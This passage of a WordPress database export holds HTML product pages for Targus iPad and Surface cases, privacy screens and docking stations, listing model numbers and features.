1.25rem;\">Multi-Gen for </strong><strong style=\"font-size: 1.25rem;\">9.7 </strong><strong style=\"font-size: 1.25rem;\">iPad Pro, iPad Air 1, and 2</strong></h3><p style=\"text-align: center;\">(THZ635GL)</p><h3 style=\"text-align: center;\"><strong>New Pro-Tek Rotating iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73711GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ634GL_FRONT_grande.png?v=1549412474\" alt=\"Black VersaVuÂ® Classic Case (Black) for iPadÂ® (2017/2018) (THZ634GL) - Front\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\" width=\"194\" height=\"194\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ73711GL_MAIN1_grande.png?v=1569597181\" alt=\"Pro-Tek Rotating Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\" width=\"198\" height=\"198\" /></p><ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Patented 360Â° rotation for portrait/landscape views</li><li>Adjustable viewing angles and comfortable typing angle</li><li>Precision cut access to controls, ports, and camera</li><li>Tray design enhances audio performance</li><li>Integrated stylus holder protects your Apple Pencilâ„¢ or stylus</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Convenient sleep/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Infinite viewing angles plus comfortable typing position</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Flexible tray with reinforced corners and bezel protection</li><li>Precision-cut access to controls, ports, and camera lenses</li><li>Easy-grip textured cover with secure magnetic wrap closure</li><li>Tray design enhances audio performance</li><li>Convenient sleep/wake function works with iPad ProÂ  (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Color Black / Charcoal &amp; Silver</li><li>Passes military grade 4ft. drop testing</li><li>Geometric Pro-Tekâ„¢ design enhances protection</li><li>Reinforced corners guard against impact</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Virtually infinite viewing angles and comfortable typing position</li><li>Precision-cut access to controls, ports, and camera</li><li>Audio-enhancing sound scoops boost sound performance</li><li>Secure magnetic wrap closure</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>New Click-In iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73608GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu </strong><strong>iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu Signature iPad 9.7\" </strong><strong>2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73902GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73608GL_MAIN1_grande.jpg?v=1571711592\" alt=\"Click-In Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\" width=\"196\" height=\"196\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73803GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73902GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Signature Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\" width=\"197\" height=\"197\" /></p><ul><li>Available Color Black/Charcoal, Rose Gold &amp; Silver</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports, and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal, Blue &amp; Red</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tek </strong><strong>11-inchÂ  </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74502GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"192\" height=\"194\" /></p><ul><li>Available Color Black &amp; Gold</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch</strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tekâ„¢ </strong><strong>Rotating Case </strong><strong>12.9-inch iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ748GL)</p><h3 style=\"text-align: center;\"><strong>VersaVuÂ® Classic Case for </strong><strong>12.9-inch </strong><strong>iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ749GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"196\" height=\"196\" /></p><ul><li>Available Color Black, Red &amp; Burgundy</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing</li><li>Geometric Pro-Tekâ„¢ design delivers practical protection and enhances stability</li><li>Patented custom-molded tray with reinforced corners guard against impact</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing</li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>12.9-inchÂ </strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ750GL)</p><h3 style=\"text-align: center;\"><strong>SafePort Rugged </strong><strong>Case for </strong><strong>12.9-inch iPad </strong><strong>(6th gen. / 5th gen.)</strong></h3><p style=\"text-align: center;\">(THD138GLZ)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050377_versavu-signature-series-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Signature Series Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/3_THD138GLZ_BACK2_1024x1024.jpg?v=1571711592\" width=\"189\" height=\"189\" /></p><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul><li>Available Color Black</li><li>Heavy duty, shock-absorbing case for the iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch)</li><li>Form-fit TPU shell with USA Military-Spec drop protection â€“ protects your device from 1.2m/4ft drops</li><li>Offers rugged protection in a slim, professional-looking case</li><li>Sound enhancing scoops for all iPad speakers</li><li>Integrated stand for stable viewing and comfortable typing</li><li>Optional detachable shoulder strap (THA101GLZ)</li><li>Compatible with the ambient light sensor and mic on your device</li><li>Clear window on back to display asset tag</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Protect Case for Microsoft Surfaceâ„¢ Go</strong></h3><p style=\"text-align: center;\">(THZ779GL)</p><h3 style=\"text-align: center;\"><strong>Protect Case for Microsoft Surfaceâ„¢ Go</strong></h3><p style=\"text-align: center;\">(THD491GLZ)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ779GL_11_PEN2_1024x1024.jpg?v=1571711592\" width=\"193\" height=\"193\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THD491GL_20_USE4_1024x1024.jpg?v=1571711592\" width=\"192\" height=\"192\" /></p><ul><li>Available Color Black</li><li>Case passes military grade 4â€™ drop testing (MIL-STD 810G)*</li><li>Hard-moulded tray with durable kickstand</li><li>Advanced corner protection with shock-absorbent TPU</li><li>Non-slip interior for infinite viewing angles</li><li>Integrated Surface Pen holder (pen not included)</li><li>Compatible with Surface Type Cover</li><li>Compatible with Surface Dock</li><li>Full access to camera and ports</li></ul><ul><li>Available Color Black</li><li>Case passes military grade 4â€™ drop testing (MIL-STD 810G)*</li><li>Hard-moulded tray with durable kickstand</li><li>Advanced corner protection with shock-absorbent TPU</li><li>Keyboard locking feature helps prevent accidental disconnects (keyboard not included)</li><li>Detachable hand strap (included) and integrated Surface Pen holder (pen not included)</li><li>Compatible with Surface Type Cover</li><li>Compatible with Surface Dock</li><li>Full access to camera and ports</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Privacy Screen</h1>		\n		<h3 style=\"text-align: center;\"><strong>Apple Macbook</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0049031_magnetic-privacy-screen-for-133-macbook-2017_ebc5f6e1-9646-4840-9ef4-6441c94ae069_grande.jpg?v=1571711592\" alt=\"Magnetic Privacy Screen for 13.3\" width=\"274\" height=\"274\" /></p><h2 style=\"text-align: center;\"><strong>Magnetic Privacy Screen for Apple MacBook</strong></h2><ul id=\"product-features\"><li>Protect your on-screen data, Privacy Screens block angled viewing from prying eyes</li><li>Magnetic screens easy to attach, remove and reattach. No tools, no adhesives, no installation required</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>AvailableÂ  for :-</li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>MacBook 12-inchÂ  (ASM12MBGL)</h4></li><li><h4>MacBook 13.3-inch (ASM133MBP6GL)</h4></li><li><h4>MacBook Air 13.3-inch (ASM133MBA7GL)</h4></li><li><h4>MacBook 15.4-inch (ASM154MBGL)</h4></li><li><h4>MacBook Pro 15.4-inch (ASM154MBP6GL)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Microsoft Surface</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0023768_privacy-screen-microsoft-surface-pro-4-123-clear_grande.jpg?v=1571711583\" alt=\"Privacy Screen Microsoft Surface Pro 4 (12.3\" width=\"215\" height=\"215\" /></p><h2 style=\"text-align: center;\">Â Microsoft Surface Pro 4 (12.3\") - Clear</h2><ul id=\"product-features\"><li>Privacy Screen for theÂ Microsoft Surface Pro 4 (12.3\") tablet</li><li>Works with touch screen</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<strong><a href=\"https://uk.targus.com/pages/keep-your-business-your-business\" target=\"_blank\" rel=\"noopener noreferrer\"><u><br /></u></a></strong></li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Laptop</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0019195_privacy-screen-116w-169_grande.jpg?v=1571711590\" alt=\"Targus Privacy Screen 11.6\" width=\"307\" height=\"307\" /></p><h2 style=\"text-align: center;\">Privacy Screen</h2><ul id=\"product-features\"><li>Privacy Screen for tablet, laptop or desktop screens</li><li>Works with touch screens and dual screens</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room</li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips</li><li>Available for :-Â </li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>Screen 11.6\"W 16:9 - (ASF116W9EU)</h4></li><li><h4>Screen 12.1\"W 16:10 - (ASF121WEU)</h4></li><li><h4>Screen 12.5\"W 16:9 - (ASF125W9EU)</h4></li><li><h4>Screen 13.3\"W 16:10 - (ASF133WEU)</h4></li><li><h4>Screen 13.3\"W 16:9 - (ASF133W9EU)</h4></li><li><h4>Screen 14.1\"W 16:10 - (ASF141WEU)</h4></li><li><h4>Screen 14.1\"W 16:9 - (ASF141W9EU)</h4></li><li><h4>Screen 14â€ W 16:9 - (ASF14W9EU)</h4></li><li><h4>Screen 15.4\"W 16:10 - (ASF154WEU)</h4></li><li><h4>Screen 15.6\"W 16:9 - (ASF156W9EU)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Monitor</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0019283_privacy-screen-17-43_grande.jpg?v=1571711590\" alt=\"Targus Privacy Screen 17\" width=\"269\" height=\"269\" /></p><h2 style=\"text-align: center;\">Privacy Screen</h2><ul id=\"product-features\"><li>Privacy Screen for laptop or desktop screens</li><li>Works with touch screens and dual screens</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room</li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips</li><li>Available for :-Â </li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>Screen 17\" 4:3 - (ASF170EU)</h4></li><li><h4>Screen 19\" 4:3 - (ASF190EU)</h4></li><li><h4>Screen 19\"W 16:10 - (ASF19WEU)</h4></li><li><h4>Screen 21.5\"W 16:9 - (ASF215W9EU)</h4></li><li><h4>Screen 22\"W 16:10 - (ASF220WEU)</h4></li><li><h4>Screen 22\"W 16:9 - (ASF22W9EU)</h4></li><li><h4>Screen 23\"W 16:9 - (ASF23W9EU)</h4></li><li><h4>Screen 23.8\"W 16:9 - (ASF238W9EU)</h4></li><li><h4>Screen 24\"W 16:10 - (ASF24WEU)</h4></li><li><h4>Screen 24\"W 16:9 - (ASF24W9EU)</h4></li><li><h4>Screen 27\"W 16:9 - (ASF27W9EU)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>','Targus','','inherit','closed','closed','','3686-revision-v1','','','2019-11-06 14:09:42','2019-11-06 06:09:42','',3686,'https://bintara.com.my/blog/2019/11/06/3686-revision-v1/',0,'revision','',0),(3704,1,'2019-11-06 14:13:47','2019-11-06 06:13:47','<p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\" alt=\"safeport rugged ipad case\" /></p><h2>Safeguard Your Valuables</h2><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and otherÂ tablet casesÂ - includingÂ Field-ReadyÂ andÂ RuggedÂ options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.</p>		\n		<h2>Expand Your Potential</h2><p>At Targus, weâ€™re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard/mice, and laptop chargers.</p><p>4K docking stationsÂ are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. OurÂ dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\" alt=\"expand your potential dock quad docking station\" width=\"519\" height=\"348\" /></p>		\n			<h1>Docking Stations</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal QUAD HD (QVHD) Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK520USZ)</p><h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal DV4K Docking Station with 100W Power</strong></h3><p style=\"text-align: center;\">(DOCK190AP)</p><h3 style=\"text-align: center;\"><strong>Thunderboltâ„¢ 3 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK220AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\" width=\"222\" height=\"222\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\" alt=\"USB-Câ„¢ Universal DV4K Docking Station with 100W Power\" width=\"210\" height=\"210\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/Dock220_grande.jpg?v=1553684715\" alt=\"Thunderboltâ„¢ 3 DV4K Docking Station with Power\" width=\"214\" height=\"214\" /></p><ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C 3.0 Port with power (15W non-PD)</li></ul><ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPortâ„¢ (DP 1.2a) and 2 HDMI (HDMI 2.0) ports</li><li>Power Delivery up to 100W</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C USB 3.1 Gen 1 device port</li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot</li><li>Power tips included to power AcerÂ®, ASUSÂ®, CompaqÂ®, Dellâ„¢, FujitsuÂ®, GatewayÂ®, HPÂ®, IBM/Lenovoâ„¢, and Toshiba</li></ul><ul><li>0.5M passive 40G, 5A cable (C/M to C/M)</li><li>Cable lock slot</li><li>Power Delivery 2.0 up to 85W</li><li>Supports dual-display</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK171)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK177)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK160AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACP71USZ_grande.png?v=1551118350\" alt=\"Universal USB 3.0 DV Docking Station with Power\" width=\"197\" height=\"197\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\" alt=\"Universal USB 3.0 DV4K Docking Station with Power\" width=\"205\" height=\"205\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock160usz_grande.png?v=1554473002\" alt=\"Universal USB 3.0 DV4K Docking Station\" width=\"205\" height=\"205\" /></p><ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone power and charging tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB ÂµB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li></ul><ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB 3.0 uB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset</li></ul><ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each</li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio</li><li>1 USB-C device port (USB 3.0 5Gbps data only)</li><li>1 Gigabit Ethernet port for wired connectivity</li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)</li><li>1 3.5mm combo Audio In/Out port for mics, speakers, and earphones</li><li>Includes 1-meter USB-ÂµB/M to A/M cable (detachable)</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment</li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms</li><li>Includes 45W AC adapter</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>USB-C Universal DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK180AP)</p><h3 style=\"text-align: center;\"><strong>USB-C Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK410AP)</p><h3 style=\"text-align: center;\"><strong>2K Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK120AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\" alt=\"USB-C Universal DV4K Docking Station with Power\" width=\"234\" height=\"234\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0041279_usb-c-universal-docking-station-black.jpeg\" width=\"236\" height=\"236\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\" alt=\"2K Universal Docking Station\" width=\"238\" height=\"238\" /></p><ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors</li><li>Power Delivery 2.0 provides up to 60W charging</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C device port (USB 3.0 data only)</li><li>1 